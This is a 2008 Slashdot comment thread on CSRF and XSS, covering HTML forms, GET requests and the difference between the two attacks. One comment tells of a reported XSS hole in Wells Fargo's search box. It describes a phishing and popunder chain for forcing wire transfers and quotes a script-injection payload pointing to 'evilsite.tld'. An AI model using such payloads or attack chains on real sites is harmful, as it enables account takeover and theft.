      Almost all forms on the internet are powered by the HTML <form> tag. Inside this <form>, different fields are indicated by <input>s.

      These inputs are either manipulated by JavaScript, or sent to another page. There are two ways to send them to another page with straight HTML.

      The first is called GET. It sends the values by putting a ? on the end of the URL, and then just listing them. It will look like http://www.google.com?q=123 [google.com] . q is the name of the field, 12
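The ?name=value query-string convention described above can be built and taken apart with the standard library; the base URL and field here are just the comment's own example:

```python
from urllib.parse import urlencode, urlparse, parse_qs

# Encode form fields into a GET query string, then parse them back out.
base = "http://www.google.com/search"
query = urlencode({"q": "123"})     # handles escaping of special characters
url = f"{base}?{query}"

assert url == "http://www.google.com/search?q=123"
assert parse_qs(urlparse(url).query)["q"] == ["123"]
```

`urlencode` also percent-escapes characters like spaces and ampersands, which is where hand-built query strings usually go wrong.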

      • Whoops, apparently it parsed my HTML tags. There are several parts in there where i meant to type in (without the dots).
        • GRR. It just takes out all tags. I meant to type in >form (with the arrows turned around)

          • by KGIII ( 973947 ) *

            As the AC pointed out, you're in HTML format. I change the settings to always post in plain text. It is easier, paragraph breaks work better, and you can still use HTML in it. I'm not sure if I did anything special or if it just likes me, but it also automagically makes typed URLs into links.

      • that has nothing to do with CSRF [wikipedia.org]. if the other article is unclear, try reading the Freedom to Tinker article [freedom-to-tinker.com].
    • by sk89q ( 1087579 )
      XSS is done on the target site. CSRF is done on a different site.
  • irony (Score:3, Funny)

    by The Clockwork Troll ( 655321 ) on Monday September 29, 2008 @11:51PM (#25201219) Journal
    The unexpected conclusion of Zeller and Felton's paper is that the worldwide banking collapse is actually a protective measure against malware. With assets illiquid, even CSRF attacks can't move money!
  • You don't even need to read cookies to exploit this feature. This technique is probably used in stock-fraud pump-and-dump schemes. Google Finance has a trend display that shows the most "popular" stocks based on Google Trends technology. Fraudsters probably popularize stocks they've purchased by seeding web sites with images that search Google for the company name of the stock. As more folks search for the company, the stock becomes more popular. As it gets popular, it gets more eyeballs looking at it and investing in it w

  • Unsurprising (Score:5, Informative)

    by karmatic ( 776420 ) on Tuesday September 30, 2008 @02:06AM (#25201899)

    This really isn't that surprising. A number of years ago, I was in a Wells Fargo branch; their kiosks are limited to showing only wellsfargo.com.

    So, in an attempt to get to another site, I typed some HTML into the search box that appears on their homepage and pretty much every page on their site. Sure enough, it inserted the HTML into the page without any problems.

    So, I got home, and whipped up a phishing email. It went to wellsfargo.com, used a little javascript to do a popunder, and set window.location to wellsfargo.com. The popunder self-refreshed every few seconds, and checked the cookies to see when the user had logged in. After the user logs in, it waits 9 minutes (auto-logout was 10 minutes), and then would build a form to initiate a wire transfer, and submit it - while the user was still logged in. It would then close the popunder.

    So, with a simple link to a search for something like <script src="http://evilsite.tld">, I could take complete control over someone's bank account. This would be easy to pull off with an email saying something like "We have detected suspicious activity; click here to log on to wellsfargo.com". It really would take them to wellsfargo.com, and they could log in. You don't need a user/password if you control the browser.

    I let them know that day, and explained how one escapes HTML. To their credit, it was fixed in a very short period of time. That still doesn't excuse the fact that 1) they should have known better, and 2) if you're going to check anything, it should be the one form that's on every page.
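The fix the poster describes, escaping HTML before echoing user input back into a page, is a one-liner in most languages. A sketch in Python (the page template is hypothetical; the payload is the one from the story):

```python
import html

# The injected payload from the story above.
payload = '<script src="http://evilsite.tld"></script>'

def render_search_page(query):
    """Echo a search term safely: html.escape turns <, >, &, and quotes
    into entities, so injected markup renders as inert text instead of
    executing in the victim's browser."""
    return f"<p>Results for: {html.escape(query)}</p>"

page = render_search_page(payload)
assert "<script" not in page      # the tag never reaches the browser as markup
assert "&lt;script" in page       # it is displayed as harmless text instead
```

Note this addresses the XSS half of the story (reflected script injection); the CSRF-style popunder it enabled is a separate problem that tokens, not escaping, defend against.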

  • Will Firefox w/NoScript installed block this sort of misbehavior?

